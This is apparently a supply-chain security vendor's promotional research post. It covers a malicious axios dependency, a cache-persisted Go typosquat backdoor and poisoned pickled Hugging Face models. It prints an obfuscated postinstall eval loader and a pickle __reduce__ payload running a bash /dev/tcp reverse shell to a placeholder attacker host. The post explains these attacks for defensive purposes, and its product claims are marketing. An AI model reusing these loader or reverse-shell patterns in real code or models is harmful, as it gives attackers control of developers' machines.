← all posts Research · Go · AI · PyPI · npm

First to block Go.
Built for the AI supply chain.

AI is built on PyPI and npm, and it is served on Go. CyberXYZ watches all of them in real time, reads the source commit by commit, and blocks malicious code at install. This is the story of that work, told through packages we actually stopped.

The surface others skipped

AI runs on packages.
We block the bad ones at install.

Every AI system is an assembly of other people's code. The training scripts, the inference stacks, the vector stores, and the agent frameworks all arrive as packages from PyPI and npm. And the cloud that serves those models runs on Go, the one ecosystem the market left unguarded. We cover all of it, in one platform, and the verdict lands before the code runs.

1stto block the Go module supply chain in real time
3+ yrsa cached Go backdoor hid before a verdict like ours
Commitlevel review, before a CVE exists
6ecosystems, one platform
Read at the commit level

We catch the compromise
at the source, before the CVE.

Blocking a package that is already on a blocklist is table stakes. The harder problem is catching a compromise the first time anyone sees it, before there is a CVE. When axios shipped a version that pulled in a dependency it had never used before, that dependency added an obfuscated install hook at the commit level. We read the change and blocked it.

upstream commitchore: add crypto helperplain-crypto-js · a new dependency of axios@1.14.1
package.json · setup.js
12+ "scripts": { "postinstall": "node ./setup.js" }
01+ const p = eval(Buffer.from(reversed, "base64").toString());
02+ p(); // runs a cross platform payload on every install
Commit level A brand new dependency adds a postinstall and an obfuscated loader in a single commit. CyberXYZ reads this at the source, so the compromise is flagged as it happens, not after the package ships and someone gets hit. Attributed to Sapphire Sleet (DPRK).

fig. 01 · commit-level review · the axios compromise, caught at the source. Full write-up on the CyberXYZ blog.

First to block Go

Go was built to trust the cache.
Attackers noticed.

Go has no central registry. Code is pulled straight from source hosts, and the Go Module Mirror caches each version permanently. That design has a sharp edge: a poisoned version, cached once, outlives the repository that served it. Here is how one attacker used that, and where CyberXYZ steps in.

  1. the bait

    A typosquat, one hyphen off a trusted module

    The attacker publishes github.com/boltdb-go/bolt, an impersonation of github.com/boltdb/bolt, the BoltDB database trusted by teams at Shopify and Heroku. Inside is a backdoor that opens a connection to a command-and-control host and runs shell commands it receives.

  2. the lock-in

    The Module Mirror caches it, permanently

    The poisoned version is fetched once, and the Go Module Mirror caches it for good. In Go there is no registry to pull from later, the mirror is the source of truth, so that cached copy is now what the ecosystem will serve.

  3. the cover-up

    Rewrite the tag, and the repository looks clean

    The attacker repoints the GitHub tag back at clean, harmless code. Anyone auditing the repository by hand sees nothing wrong. The malicious bytes no longer live in the repo, they live in the cache.

  4. the persistence

    Every install keeps pulling the cached backdoor · for 3+ years

    Developers who ran go get kept receiving the cached malicious version, not the clean repository. The backdoor stayed live and undetected for more than three years, published in 2021 and only reported in 2025.

  5. the verdict

    CyberXYZ blocks it at install

    Because we watch the Go module supply chain at publish, in real time, a poisoned version is caught as it enters the ecosystem, not three years later. Run against the live module, the proxy returns BLOCK before the cached backdoor can reach a build. First to watch Go, and first to block it.

app.cyberxyz.io/notifications
install verdict · go modulego · block

Blocked install: github.com/boltdb-go/bolt · go

0/10
RISK SCORE critical · verdict block
SIGNALS
HOW LONG IT HID0+ years cached · impersonates a module trusted at Shopify, Heroku
boltdb-go/boltC2 backdoorcache-persisted
STATEMENTEcosystem go · decision block (confidence 1.0) · typosquat of boltdb/bolt with a cache-persistent backdoor · no CVE required
SIGNALS · 3 of 3 fired
01Typosquat of a trusted moduletriggeredCRITICAL

github.com/boltdb-go/bolt impersonates github.com/boltdb/bolt, the BoltDB database trusted across the Go ecosystem, one hyphen away from the real name.

02Cache persistencetriggeredCRITICAL

The malicious version was cached by the Go Module Mirror and kept being served after the source tag was rewritten to clean code, so a repository audit reveals nothing.

03Remote command executionmatchedCRITICAL

The package opens a backdoor to a command-and-control host and runs shell commands it receives, with no validation.

MODULE boltdb-go/boltIMPERSONATES boltdb/boltECOSYSTEM goDECISION BLOCK

fig. 02 · install verdict · the Go backdoor CyberXYZ blocks at install. Technique reported by Socket and The Hacker News (2025).

Real verdicts, real installs

Not an advisory after the fact.
The verdict, at install.

These are two of the answers the CyberXYZ proxy returns, one in Go, one in npm, each returned before the package could run. The same engine, the same decision, whichever ecosystem the install came from.

app.cyberxyz.io/proxy/findings
Search package, IP, OS…All typesAll risk levels live
verdictGogithub.com/boltdb-go/bolt cache-persistent backdoorBLOCKany runner CI/CDat installCRITICAL
verdictnpmaxios@1.14.1 · obfuscated install hookBLOCKany runner DEVat installCRITICAL

fig. 03 · proxy findings · two real blocks, one Go, one npm, both returned at install

Built for AI models

A model is not just data.
Loading it can run code.

This is the surface we were built for. A model pulled from a public hub is a serialized object, and loading it can execute whatever was packed inside. In February 2025, researchers found models on Hugging Face doing exactly that, crafted to slip past the platform's own scanner. Here is the class, and how we watch for it.

  1. the upload

    A model lands on a public hub

    An attacker publishes a model to a hub like Hugging Face. To a data scientist it looks like weights to download and load. Under the surface it is a serialized file, and loading a serialized file can run code.

  2. the payload

    A reverse shell rides inside the model file

    The serialized model carries injected code that opens a reverse shell to a hardcoded host the moment the model is loaded. No exploit, no separate download. The load is the execution.

  3. the evasion · nullifAI

    Packaged to slip past the standard scanner

    The file is built so the platform's default loader and its pickle scanner choke on it, while the malicious code still runs. Researchers named this technique nullifAI, for what it does to the tools meant to catch it.

  4. the load

    One call, and the attacker has a shell

    The moment the model is loaded, on a laptop, a training box, or an inference server, the reverse shell connects back. The person who trusted the model just handed over the machine.

  5. the answer

    CyberXYZ reads the model before it loads

    We watch the model hubs and read each model's serialized format for the operations that turn a load into code execution, before it reaches a machine. And when a published model is quietly overwritten, the way clean weights get swapped for poisoned ones, we see the change. This is the class the platform was built for.

Hugging Facehuggingface.co/acme-nlp/bert-sentiment · pytorch_model.bin
# to a data scientist, this line just loads some weights
model = torch.load("pytorch_model.bin")

# but the serialized object defines __reduce__, which the
# unpickler calls on its own, the moment the model loads:
class Payload:
    def __reduce__(self):
        return (os.system, ("bash -i >& /dev/tcp/<attacker>/4444 0>&1",))
# no CVE, no exploit. loading the model is the exploit.

fig. 04 · the malicious-model class · a poisoned model that opens a reverse shell on load, reported by ReversingLabs and The Hacker News (2025)

Where AI risk lives

The model is one surface.
We watch the rest too.

A poisoned model is the sharpest example, but AI carries other artifacts that hold the same trust a dependency does. The hub it came from and the framework your agents depend on get the same scrutiny.

AI model artifacts

The model files themselves, where an unsafe loading path or an embedded payload turns a download into code execution.

Model registries and hubs

The distribution points where AI teams source models, and where a compromised or impersonated entry spreads fast.

AI developer tooling

The frameworks, SDKs, and agent libraries that AI projects install and trust, often with broad access.

The AI dependency chain

The PyPI, npm, and Go packages underneath AI systems, where one hijacked link reaches every model built on it.

One platform, every ecosystem

AI lives on PyPI and npm.
The cloud runs on Go.

We watch the ecosystems AI is actually built and served on, plus the enterprise stacks around them, and we apply the same install-time verdict to each.

PyPIPyPIThe Python that runs machine learning and AI training.AI substrate
npmnpmThe JavaScript that drives AI tooling and agents.AI substrate
Hugging FaceHugging FaceThe hub AI teams pull model weights from, read before they load.AI models
GoGoThe cloud layer that serves AI in production.First in market
NuGet.NET / NuGetThe enterprise .NET package supply chain.
MicrosoftMicrosoftMicrosoft security advisories, MSRC, folded into the verdict.
MavenMaven, and moreBroad reach across the ecosystems that build software.

fig. 05 · coverage · PyPI and npm carry AI, Hugging Face carries the models, Go carries the cloud, and the enterprise stacks around them

CyberXYZ was built in collaboration with academic partners, and its detection methods come out of research into how supply chain attacks behave. That is why the platform reads source commits, package provenance, and behavior rather than waiting for a vulnerability to be catalogued, and why the coverage reaches the surfaces the industry under studied, Go and the AI supply chain first among them. The Go backdoor above was documented by Socket and The Hacker News, and the malicious-model class by ReversingLabs. How the engine decides: the methodology.

// the ask

Cover where the risk
is actually heading.

Go, AI models, PyPI, npm, and .NET, in one platform, blocked at install. See it read your own dependency tree in a 15-minute walkthrough, and we will plug the proxy into your CI in under an hour.

Book a demo → Check a package